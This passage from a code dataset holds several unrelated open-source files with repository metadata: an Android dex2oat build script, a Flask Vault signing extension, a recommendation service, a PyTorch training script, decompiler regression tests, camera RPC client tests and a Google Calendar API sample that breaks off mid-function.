consolidate(dex_list):\n last_dex_name = None\n curr_dex_files = {}\n all_dex_maps = {}\n # Reverse sorting makes sure that \"xxx.dex\" comes before \"xxx-classesN.dex\"\n # \"__dummy.dex\" helps populate the last mapping\n for dex in sorted(dex_list, reverse=True) + [\"__dummy.dex\"]:\n if dex[-4:] != \".dex\":\n continue\n # print(dex)\n if last_dex_name:\n if dex.startswith(last_dex_name + \"-classes\"):\n curr_dex_files[dex] = dex[dex.rfind(\"-\")+1:]\n elif last_dex_name != dex:\n all_dex_maps[last_dex_name] = curr_dex_files\n # print(last_dex_name, curr_dex_files)\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n else:\n curr_dex_files = {dex: \"classes.dex\"}\n last_dex_name = dex[:-4]\n return all_dex_maps\n\ndef zip_dex(dex_maps, src_dir, dest_dir, suffix):\n for dex_name, dex_mapping in dex_maps.items():\n rmall(TMP_FOLDER)\n mkdir(TMP_FOLDER)\n str_dex_list = \"\"\n for org_dex_name, new_dex_name in dex_mapping.items():\n subprocess.call(\"cp %s/%s %s/%s\" % (src_dir, org_dex_name, TMP_FOLDER, new_dex_name), shell=True)\n str_dex_list += \" \" + new_dex_name\n tmp_path = TMP_FOLDER + \"/\" + dex_name + suffix\n dest_path = dest_dir + \"/\" + dex_name + suffix\n subprocess.call(\"cd \" + TMP_FOLDER + \" && zip -q \" + dex_name + suffix + str_dex_list, shell=True)\n subprocess.call(\"zipalign 4 \" + tmp_path + \" \" + dest_path, shell=True)\n rmall(TMP_FOLDER)\n\nmkdir(OUT_BASE_FOLDER)\n\n\nCOMPONENT, EXT = \"boot\", \".jar\"\nORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\nDEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\nOUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\nREMOTE_BASE_FOLDER = \"/system/framework/\"\nONHOST_BASE_FOLDER = ONHOST_SYSTEM_ROOT + \"/framework\"\n\nrmall(OUT_COMPO_FOLDER)\nmkdir(OUT_COMPO_FOLDER)\n\ndex_list = listfiles(DEOAT_COMPO_FOLDER)\ncons_dex_list = consolidate(dex_list)\nzip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\nfor (arch, arch_variant) in ARCH:\n ORG_ARCH_F = ORG_COMPO_FOLDER + \"/\" + arch + \"/boot.oat\"\n if not os.path.exists(ORG_ARCH_F):\n continue\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n ONHOST_ARCH_FOLDER = ONHOST_BASE_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n OUT_ARCH_F = OUT_ARCH_FOLDER + \"/boot.oat\"\n ONHOST_ARCH_F = ONHOST_ARCH_FOLDER + \"/boot.oat\"\n ARCH_BOOT_OAT_PATH[arch] = ONHOST_BASE_FOLDER + \"/boot.oat\"\n # ARCH_BOOT_CLASS_PATH[arch] = boot_class_path = []\n\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, ORG_ARCH_F), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n\n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx64m \"\n \"--image-classes=\" + ONHOST_SYSTEM_ROOT + \"/etc/preloaded-classes \" )\n \n for dex in clean_dex_list:\n # zip_loc = OUT_COMPO_FOLDER + \"/\" + dex\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n # boot_class_path.append(zip_loc)\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER + dex + \" \"\n \n dex2oat_cmd += ( \"--oat-symbols=\" + OUT_ARCH_F[len(OUT_COMPO_FOLDER)+1:-4] + \".sym \"\n \"--oat-file=\" + ONHOST_ARCH_F + \" \"\n \"--oat-location=\" + 
REMOTE_BASE_FOLDER + arch + \"/boot.oat \"\n \"--image=\" + ONHOST_ARCH_F[:-4] + \".art \"\n \"--base=0x70000000 \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info\" )\n print(dex2oat_cmd)\n os.system(\"rm \" + ONHOST_ARCH_F + \" \" + ONHOST_ARCH_F[:-4] + \".art\")\n subprocess.call(dex2oat_cmd, shell=True)\n os.system(\"cp \" + ONHOST_ARCH_F + \" \" + OUT_ARCH_F)\n os.system(\"cp \" + ONHOST_ARCH_F[:-4] + \".art\" + \" \" + OUT_ARCH_F[:-4] + \".art\")\n # sys.exit(0)\n\nraw_input(\"Press Enter to continue...\")\n\nfor COMPONENT, EXT, REPEAT_NAME in [\n (\"framework\", \".jar\", False),\n (\"app\", \".apk\", True),\n (\"priv-app\", \".apk\", True)\n ]:\n ORG_COMPO_FOLDER = ORG_BASE_FOLDER + \"/\" + COMPONENT\n DEOAT_COMPO_FOLDER = DEOAT_BASE_FOLDER + \"/\" + COMPONENT\n OUT_COMPO_FOLDER = OUT_BASE_FOLDER + \"/\" + COMPONENT\n REMOTE_BASE_FOLDER = \"/system/\" + COMPONENT + \"/\"\n\n rmall(OUT_COMPO_FOLDER)\n mkdir(OUT_COMPO_FOLDER)\n\n dex_list = listfiles(DEOAT_COMPO_FOLDER)\n cons_dex_list = consolidate(dex_list)\n zip_dex(cons_dex_list, DEOAT_COMPO_FOLDER, OUT_COMPO_FOLDER, EXT)\n\n for (arch, arch_variant) in ARCH:\n ORG_ARCH_FOLDER = ORG_COMPO_FOLDER + \"/\" + arch\n BOOT_ART_PATH = ARCH_BOOT_OAT_PATH[arch][:-4] + \".art\"\n # str_boot_class_path = \":\".join(ARCH_BOOT_CLASS_PATH[arch])\n OUT_ARCH_FOLDER = OUT_COMPO_FOLDER + \"/\" + arch\n mkdir(OUT_ARCH_FOLDER)\n\n for odex in listfiles(ORG_ARCH_FOLDER):\n if odex[-5:] != \".odex\":\n continue\n org_odex_path = ORG_ARCH_FOLDER + \"/\" + odex\n # out_odex_path = OUT_ARCH_FOLDER + \"/\" + odex\n out_odex_path = arch + \"/\" + odex\n dex_list = subprocess.check_output(\"%s list dex %s\" % (BAKSMALI_BASE, org_odex_path), shell=True)\n dex_list = [f.strip() for f in dex_list.strip().split(\"\\n\")]\n clean_dex_list = []\n\n for dex_path in dex_list:\n if not dex_path.startswith(REMOTE_BASE_FOLDER):\n continue\n dex_fn = dex_path[dex_path.rfind(\"/\")+1:]\n if \":\" in dex_fn:\n continue\n if not dex_fn.endswith(EXT):\n continue\n clean_dex_list.append(dex_fn)\n \n dex2oat_cmd = \"cd \" + OUT_COMPO_FOLDER + \" && \"\n dex2oat_cmd += ( DEX2OAT_BASE + \" \"\n \"--runtime-arg -Xms64m \"\n \"--runtime-arg -Xmx512m \"\n \"--boot-image=\" + BOOT_ART_PATH + \" \" )\n \n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-file=\" + dex + \" \"\n for dex in clean_dex_list:\n dex2oat_cmd += \"--dex-location=\" + REMOTE_BASE_FOLDER\n if REPEAT_NAME:\n dex2oat_cmd += dex[:-len(EXT)] + \"/\"\n dex2oat_cmd += dex + \" \"\n\n dex2oat_cmd += ( \"--oat-file=\" + out_odex_path + \" \"\n \"--android-root=\" + ONHOST_SYSTEM_ROOT + \" \"\n \"--instruction-set=\" + arch + \" \"\n \"--instruction-set-variant=\" + arch_variant + \" \"\n \"--instruction-set-features=default \"\n \"--include-patch-information \"\n \"--runtime-arg -Xnorelocate \"\n \"--no-generate-debug-info \"\n \"--abort-on-hard-verifier-error\" )\n print(dex2oat_cmd)\n subprocess.call(dex2oat_cmd, shell=True)\n # break\n # break\n","repo_name":"TOLLER-Android/main","sub_path":"agent-build/gen-oat.py","file_name":"gen-oat.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"36"} +{"seq_id":"42997192151","text":"import os\n\nfrom base64 import (\n b64decode,\n 
b64encode,\n)\n\nimport hvac\n\nfrom flask import g\n\nfrom cabotage.utils.cert_hacks import construct_cert_from_public_key\n\n\nclass Vault(object):\n def __init__(self, app=None):\n self.app = app\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n self.vault_url = app.config.get(\"VAULT_URL\", \"http://127.0.0.1:8200\")\n self.vault_verify = app.config.get(\"VAULT_VERIFY\", False)\n self.vault_cert = app.config.get(\"VAULT_CERT\", None)\n self.vault_token = app.config.get(\"VAULT_TOKEN\", None)\n self.vault_token_file = app.config.get(\n \"VAULT_TOKEN_FILE\", os.path.expanduser(\"~/.vault-token\")\n )\n self.vault_token_unwrap = app.config.get(\"VAULT_TOKEN_UNWRAP\", False)\n self.vault_prefix = app.config.get(\"VAULT_PREFIX\", \"secret/cabotage\")\n self.vault_signing_mount = app.config.get(\"VAULT_SIGNING_MOUNT\", \"transit\")\n self.vault_signing_key = app.config.get(\"VAULT_SIGNING_KEY\", \"cabotage-app\")\n\n if self.vault_token is None:\n if os.path.exists(self.vault_token_file):\n with open(self.vault_token_file, \"r\") as vault_token_file:\n self.vault_token = vault_token_file.read().lstrip().rstrip()\n\n # Unwrap!\n # if self.vault_token_unwrap:\n # unwrap_dang_token\n\n app.teardown_appcontext(self.teardown)\n\n def connect_vault(self):\n vault_client = hvac.Client(\n url=self.vault_url,\n token=self.vault_token,\n verify=self.vault_verify,\n cert=self.vault_cert,\n )\n return vault_client\n\n def teardown(self, exception):\n g.pop(\"vault_client\", None)\n\n @property\n def vault_connection(self):\n if \"vault_client\" not in g:\n g.vault_client = self.connect_vault()\n return g.vault_client\n\n @property\n def signing_public_key(self):\n VAULT_TRANSIT_KEY = f\"{self.vault_signing_mount}/keys/{self.vault_signing_key}\"\n key_data = self.vault_connection.read(VAULT_TRANSIT_KEY)\n keys = key_data[\"data\"][\"keys\"]\n latest = str(key_data[\"data\"][\"latest_version\"])\n return keys[latest][\"public_key\"].encode()\n\n @property\n def signing_cert(self):\n return construct_cert_from_public_key(\n self.sign_payload,\n self.signing_public_key,\n \"cabotage-app\",\n )\n\n def sign_payload(self, payload, algorithm=\"sha2-256\", marshaling_algorithm=\"asn1\"):\n if algorithm not in (\"sha2-224\", \"sha2-256\", \"sha2-384\", \"sha2-512\"):\n raise KeyError(f\"Specified algorithm ({algorithm}) not supported!\")\n VAULT_TRANSIT_SIGNING = (\n f\"{self.vault_signing_mount}/sign/{self.vault_signing_key}/{algorithm}\"\n )\n signature_response = self.vault_connection.write(\n VAULT_TRANSIT_SIGNING,\n input=b64encode(payload.encode()).decode(),\n marshaling_algorithm=marshaling_algorithm,\n )\n if marshaling_algorithm == \"jws\":\n return signature_response[\"data\"][\"signature\"].split(\":\")[2]\n signature_encoded = signature_response[\"data\"][\"signature\"].split(\":\")[2]\n return b64decode(signature_encoded)\n","repo_name":"cabotage/cabotage-app","sub_path":"cabotage/server/ext/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"36"} +{"seq_id":"43606644090","text":"stack=[]\r\ndef stackpush():\r\n item=input(\"Enter your stack item to add : \")\r\n stack.append(item)\r\n print(item,\" has been added to stack\")\r\n\r\ndef stackpop():\r\n item=stack.pop()\r\n print(item,\" has been removed from stack\")\r\n\r\ndef stackview():\r\n print(\"Stack : \", stack)\r\n\r\nchoice_dict={'u':'stackpush','o':'stackpop','v':'stackview'}\r\ndef welcome():\r\n 
print('''Welcome to stack. Please choose an option(u/o/v/e)\r\n P(u)sh\r\n P(o)p\r\n (V)iew\r\n (E)xit''')\r\n choice=input(\"Enter your option(u/o/v/e) : \")\r\n while True :\r\n if choice not in 'uove' :\r\n print(\"Invalid choice\")\r\n else:\r\n if choice == 'u':\r\n stackpush()\r\n welcome()\r\n elif choice == 'o' :\r\n stackpop()\r\n welcome()\r\n elif choice == 'v' :\r\n stackview()\r\n welcome()\r\n else :\r\n print('Exiting ......')\r\n exit()\r\n\r\n\r\n\r\nwelcome()","repo_name":"Kulamanipradhan0/Python","sub_path":"DataType/List/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27049414239","text":"import os\nimport json\nimport time\n\nfrom flask import Flask\nfrom pathlib import Path\nimport joblib\n\nfrom google.cloud import storage\n\nGOOGLE_CLOUD_PROJECT = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"local\")\nBUCKET_NAME = os.environ.get(\"GOOGLE_CLOUD_PROJECT\", \"kz-rec-sys-dev\")\nTMP_MODEL_DIR = Path(os.environ.get(\"TMP_MODEL_DIR\", \"/tmp\"))\n\nif GOOGLE_CLOUD_PROJECT == \"local\":\n service_account_json = str(Path.home() / '.gcp/kz-rec-sys-dev.json')\n storage_client = storage.Client.from_service_account_json(service_account_json)\nelse:\n storage_client = storage.Client()\n\nbucket = storage_client.get_bucket(BUCKET_NAME)\n\napp = Flask(__name__)\n\nmodels = {}\n\norganization_ids = [16655]\nfilenames = [\"model\", \"uuid_cat_id_map\", \"show_cat_id_map\", \"user_items\"]\n\nfor organization_id in organization_ids:\n models[organization_id] = {}\n organization_tmp_dir = TMP_MODEL_DIR / str(organization_id)\n if not organization_tmp_dir.is_dir():\n organization_tmp_dir.mkdir(parents=True)\n\n # ダウンロード\n for filename in filenames:\n gcs_path = f\"{organization_id}/{filename}.pickle\"\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n if not local_path.exists():\n bucket.blob(gcs_path).download_to_filename(local_path)\n\n # joblib load\n for filename in filenames:\n local_path = organization_tmp_dir / f\"{filename}.pickle\"\n print(local_path)\n for _ in range(100):\n try:\n models[organization_id][filename] = joblib.load(open(local_path), \"rb\")\n except:\n print(\"error\")\n time.sleep(1)\n else:\n print(\"done\")\n break\n\n@app.route('/')\ndef hello_world():\n target = os.environ.get('TARGET', 'World')\n return 'Hello {}!\\n'.format(target)\n\n@app.route('/rec/')\ndef rec():\n organization_id = 16655\n uuid = '0000019a-f4cd-9a19-6445-58fc330c76db'\n model = models[organization_id]['model']\n user_items = models[organization_id]['user_items']\n uuid_cat_id_map = models[organization_id]['uuid_cat_id_map']\n show_cat_id_map = models[organization_id]['show_cat_id_map']\n recommendations = model.recommend(uuid_cat_id_map[uuid], user_items, N=30, filter_already_liked_items=True)\n rec_fmts = []\n\n for show_cat_code, score in recommendations:\n show_id = show_cat_id_map[show_cat_code]\n\n rec_fmts.append(\n {\"item_id\": show_id, \"score\": float(score)}\n )\n\n return json.dumps(rec_fmts)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080, debug=True)","repo_name":"ikedaosushi/sandbox","sub_path":"gcp/gae/gae_rec/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"4139797825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 13 16:37:46 
2019\n\n@author: anup\n\"\"\"\n# =============================================================================\n# Importing Libraries\n# =============================================================================\nimport os\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision\nfrom torchvision import transforms\nimport network_01 as nw\nfrom utils_01 import *\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Device :\", device)\n# =============================================================================\n# Defining Parameters\n# =============================================================================\nVERSION = 8\nEPOCHS = 100\nBATCH_SIZE = 8\nLEARNING_RATE = 0.001\nTRAIN_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\nTEST_DATA_PATH = \"/home/anup/work/multilabel/label_tool/dataset_single/new_data/\"\n\ntransformed_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/train_dataset.pkl',\n root_dir = TRAIN_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\n\ntrain_data_loader = data.DataLoader(transformed_dataset, \n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\ntransformed_test_dataset = MultiLabelDataset(img_file = '/home/anup/work/multilabel/label_tool/test_dataset.pkl',\n root_dir = TEST_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\ntest_data_loader = data.DataLoader(transformed_test_dataset,\n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\n\nprint(\"=\"*50)\n\nif __name__ == '__main__':\n\n print(\"Number of train samples: \", len(transformed_dataset))\n print(\"Number of test samples: \", len(transformed_test_dataset))\n print(\"Detected Classes are: \", transformed_dataset.class_to_idx) # classes are detected by folder structure\n class_dict = transformed_dataset.class_to_idx\n class_dict_reverse = {v: k for k, v in class_dict.items()}\n class_dict.update(class_dict_reverse)\n save_dict(class_dict, 'class_label_dict')\n\n model = nw.multi_label_vgg_model(training=True).to(device)\n optimizer = torch.optim.Adam([{'params': model.features.parameters()}, {'params': model.classifier.parameters(), 'lr': 1e-6}], lr=1e-7)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer, mode='min', patience=5, verbose=True)\n loss_func = nn.BCEWithLogitsLoss()\n\n # Training and Testing\n train_loss_list = []\n test_loss_list = []\n start_time = datetime.datetime.now()\n for epoch in range(EPOCHS):\n model = model.train()\n print(\"Epoch No: \", epoch + 1)\n running_loss = 0.0\n for step_train, train_sample_batched in enumerate(train_data_loader):\n images_batch, labels_batch = train_sample_batched['image'], train_sample_batched['comp_vector']\n images_batch = images_batch.to(device)\n labels_batch = labels_batch.to(device)\n optimizer.zero_grad()\n output = model(images_batch)\n loss = loss_func(output, labels_batch) \n loss.backward() \n optimizer.step()\n running_loss += loss.item()\n if step_train > 0:\n train_loss_list.append(running_loss / step_train)\n print('[%d] Epoch loss: %.6f' %\n (epoch + 1, running_loss / step_train))\n \n test_running_loss = 0.0\n accuracy_prd_list = []\n accuracy_inp_list = []\n for step_test, test_sample_batched in 
enumerate(test_data_loader):\n model=model.eval()\n test_inputs, test_labels = test_sample_batched['image'], test_sample_batched['comp_vector']\n test_inputs = test_inputs.cuda()\n test_labels = test_labels.cuda()\n test_output = model(test_inputs)\n test_loss = loss_func(test_output, test_labels)\n test_running_loss += test_loss.item()\n test_output[test_output > 0] = 1\n test_output[test_output < 0] = 0\n accuracy_prd_list.extend(test_output.cpu().tolist())\n accuracy_inp_list.extend(test_labels.cpu().tolist())\n test_loss = 0.0\n test_loss_list.append(test_running_loss/step_test)\n scheduler.step(test_running_loss)\n print('[%d] Valid loss: %.6f' %\n (epoch + 1, test_running_loss/step_test))\n accuracy_prd_list = [item for sublist in accuracy_prd_list for item in sublist]\n accuracy_inp_list = [item for sublist in accuracy_inp_list for item in sublist]\n test_accuracy = []\n for i in range(len(accuracy_prd_list)):\n if accuracy_prd_list[i] == accuracy_inp_list[i]:\n test_accuracy.append(1)\n else:\n test_accuracy.append(0)\n print('[%d] Valid accuracy: %.2f' %\n (epoch + 1, round(100 * sum(test_accuracy)/len(accuracy_inp_list), 2)))\n print(\"=\"*50)\n print(\" \"*50)\nfinish_time = datetime.datetime.now()\ntime_diff = finish_time - start_time\nprint (\"Training time: \", divmod(time_diff.total_seconds(), 60))\ntorch.save(model.state_dict(), 'model/model_single_v' + str(VERSION) + '.pt')\n# Create count of the number of epochs\nepoch_count = range(1, len(train_loss_list) + 1)\n\n# Visualize loss history\nplt.plot(epoch_count, train_loss_list, 'r--')\nplt.plot(epoch_count, test_loss_list, 'b-')\nplt.legend(['Training Loss', 'Test Loss'])\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.savefig('/home/anup/work/multilabel/losses/' + str(VERSION) + '.jpg')\nplt.show()\n\n\n\n \n","repo_name":"anupkhalam/Damage-Detection-Demo","sub_path":"train_01.py","file_name":"train_01.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37400709017","text":"from regression_tests import *\n\nclass TestBase(Test):\n def test_produce_expected_output(self):\n self.assert_c_produces_output_when_run(\n input='1 2 3',\n expected_return_code=4,\n expected_output='XYZ\\n'\n )\n self.assert_c_produces_output_when_run(\n input='0 10 0',\n expected_return_code=3,\n expected_output='XY\\n'\n )\n\nclass Test_2018(TestBase):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', excluding=r'.*\\.exe'),\n )\n\nclass Test_2018_x64Pe(Test):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', matching=r'.*\\.exe'),\n )\n\n def test_check_function_func(self):\n assert self.out_c.has_func('func')\n func = self.out_c.funcs['func']\n assert func.return_type.is_int(32)\n assert func.param_count == 0\n assert func.has_any_if_stmts()\n assert func.has_any_return_stmts()\n assert func.calls('scanf')\n assert func.calls('printf') or func.calls('puts')\n if func.calls('printf'):\n assert self.out_c.has_string_literal('XYZ\\\\n')\n assert self.out_c.has_string_literal('XY\\\\n')\n assert self.out_c.has_string_literal('X\\\\n')\n\n elif func.calls('puts'):\n assert self.out_c.has_string_literal('XYZ')\n assert self.out_c.has_string_literal('XY')\n assert self.out_c.has_string_literal('X')\n\n def test_check_funcion_main(self):\n assert self.out_c.has_func('main')\n assert self.out_c.funcs['main'].calls('func')\n assert self.out_c.funcs['main'].has_any_return_stmts()\n assert 
len(self.out_c.funcs['main'].return_stmts) == 1\n\n def test_check_presence_of_literals(self):\n assert self.out_c.has_string_literal('%d %d %d')\n\nclass Test_2017(TestBase):\n settings_2017 = TestSettings(\n input=files_in_dir('2017-11-14'),\n )\n\nclass Test_2015(TestBase):\n settings_2015 = TestSettings(\n input=files_in_dir('2015-03-30'),\n )\n","repo_name":"avast/retdec-regression-tests","sub_path":"integration/nested-if-returns/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"32191744759","text":"from unittest import TestCase\ntry:\n from source import O2x5xxRPCDevice\n from tests.utils import *\n from .config import *\nexcept ModuleNotFoundError:\n import os\n import sys\n sys.path.insert(0, '../source')\n from utils import *\n from config import *\nimport numpy as np\nimport warnings\nimport time\n\n\nclass TestRPC_MainAPI(TestCase):\n rpc = None\n session = None\n config_backup = None\n active_application_backup = None\n pin_layout = None\n\n @classmethod\n def setUpClass(cls):\n cls.rpc = O2x5xxRPCDevice(deviceAddress)\n cls.session = cls.rpc.requestSession()\n cls.config_backup = cls.session.exportConfig()\n cls.active_application_backup = cls.rpc.getParameter(\"ActiveApplication\")\n configFile = getImportSetupByPinLayout(rpc=cls.rpc)['config_file']\n configFile = cls.session.readConfigFile(configFile=configFile)\n cls.session.importConfig(configFile, global_settings=True, network_settings=False, applications=True)\n cls.rpc.switchApplication(1)\n\n @classmethod\n def tearDownClass(cls):\n cls.session.importConfig(cls.config_backup, global_settings=True, network_settings=False, applications=True)\n if cls.active_application_backup != \"0\":\n cls.rpc.switchApplication(cls.active_application_backup)\n cls.session.cancelSession()\n\n def setUp(self):\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed.*\")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed \")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed running multiprocessing pool.*>\")\n self.rpc.switchApplication(1)\n\n def test_getParameter(self):\n result = self.rpc.getParameter(value=\"DeviceType\")\n self.assertIsInstance(result, str)\n self.assertEqual(len(result), 5)\n\n def test_getAllParameters(self):\n result = self.rpc.getAllParameters()\n self.assertIsInstance(result, dict)\n\n def test_getSWVersion(self):\n result = self.rpc.getSWVersion()\n self.assertIsInstance(result, dict)\n\n def test_getHWInfo(self):\n result = self.rpc.getHWInfo()\n self.assertIsInstance(result, dict)\n\n def test_getDmesgData(self):\n result = self.rpc.getDmesgData()\n self.assertIsInstance(result, str)\n\n def test_getClientCompatibilityList(self):\n result = self.rpc.getClientCompatibilityList()\n self.assertIsInstance(result, list)\n\n def test_getApplicationList(self):\n result = self.rpc.getApplicationList()\n self.assertIsInstance(result, list)\n self.assertIsInstance(result[0], dict)\n self.assertIsInstance(result[1], dict)\n self.assertIsInstance(result[2], dict)\n self.assertIsInstance(result[3], dict)\n self.assertIsInstance(result[4], dict)\n self.assertIsInstance(result[5], dict)\n\n def test_switchApplication(self):\n initial_application = int(self.rpc.getParameter(\"ActiveApplication\"))\n if initial_application > 1:\n self.rpc.switchApplication(applicationIndex=1)\n while 
self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 1)\n else:\n self.rpc.switchApplication(applicationIndex=2)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 2)\n time.sleep(5)\n # Switch back to initial application\n self.rpc.switchApplication(applicationIndex=initial_application)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), initial_application)\n\n def test_getTraceLogs(self):\n numberLogs = 10\n traces = self.rpc.getTraceLogs(nLogs=numberLogs)\n self.assertIsInstance(traces, list)\n self.assertEqual(len(traces), numberLogs)\n\n def test_getApplicationStatisticData(self):\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n result = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n self.assertIsInstance(result, dict)\n\n def test_getReferenceImage(self):\n result = self.rpc.getReferenceImage()\n self.assertIsInstance(result, np.ndarray)\n\n def test_isConfigurationDone(self):\n result = self.rpc.isConfigurationDone()\n self.assertTrue(result)\n\n def test_waitForConfigurationDone(self):\n self.rpc.waitForConfigurationDone()\n\n def test_measure(self):\n input_measure_line = {\n \"geometry\": \"line\",\n \"pixel_positions\": [\n {\n \"column\": 980,\n \"row\": 374\n },\n {\n \"column\": 603,\n \"row\": 455\n }\n ]\n }\n\n input_measure_rect = {\n \"geometry\": \"rect\",\n \"pixel_positions\": [\n {\n \"column\": 376,\n \"row\": 426\n },\n {\n \"column\": 710,\n \"row\": 651\n }\n ]\n }\n\n input_measure_circle = {\n \"geometry\": \"circle\",\n \"pixel_positions\": [\n {\n \"column\": 647,\n \"row\": 452\n },\n {\n \"column\": 775,\n \"row\": 533\n }\n ]\n }\n\n result = self.rpc.measure(measureInput=input_measure_line)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_rect)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_circle)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n\n def test_trigger(self):\n number_trigger = 100\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n initial_application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n initial_number_of_frames = initial_application_stats['number_of_frames']\n for i in range(number_trigger):\n answer = self.rpc.trigger()\n self.assertTrue(answer)\n application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n number_of_frames = application_stats['number_of_frames']\n self.assertEqual(number_of_frames, initial_number_of_frames + number_trigger)\n\n def test_doPing(self):\n result = self.rpc.doPing()\n self.assertEqual(result, \"up\")\n","repo_name":"ifm/o2x5xx-python","sub_path":"tests/test_rpc.py","file_name":"test_rpc.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"} +{"seq_id":"4848876608","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Copyright 2014 Google Inc. 
All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"Simple command-line sample for the Calendar API.\r\nCommand-line application that retrieves the list of the user's calendars.\"\"\"\r\n\r\nimport sys\r\n\r\nfrom oauth2client import client\r\nfrom googleapiclient import sample_tools\r\n\r\nimport datetime\r\n\r\n_calendar_id = 'mamie.lora06@gmail.com'\r\n_found_calendar = None\r\n\r\n\r\ndef main(argv):\r\n # Authenticate and construct service.\r\n service, flags = sample_tools.init(\r\n argv, 'calendar', 'v3', __doc__, __file__,\r\n scope='https://www.googleapis.com/auth/calendar.readonly')\r\n\r\n try:\r\n page_token = None\r\n \r\n \r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC 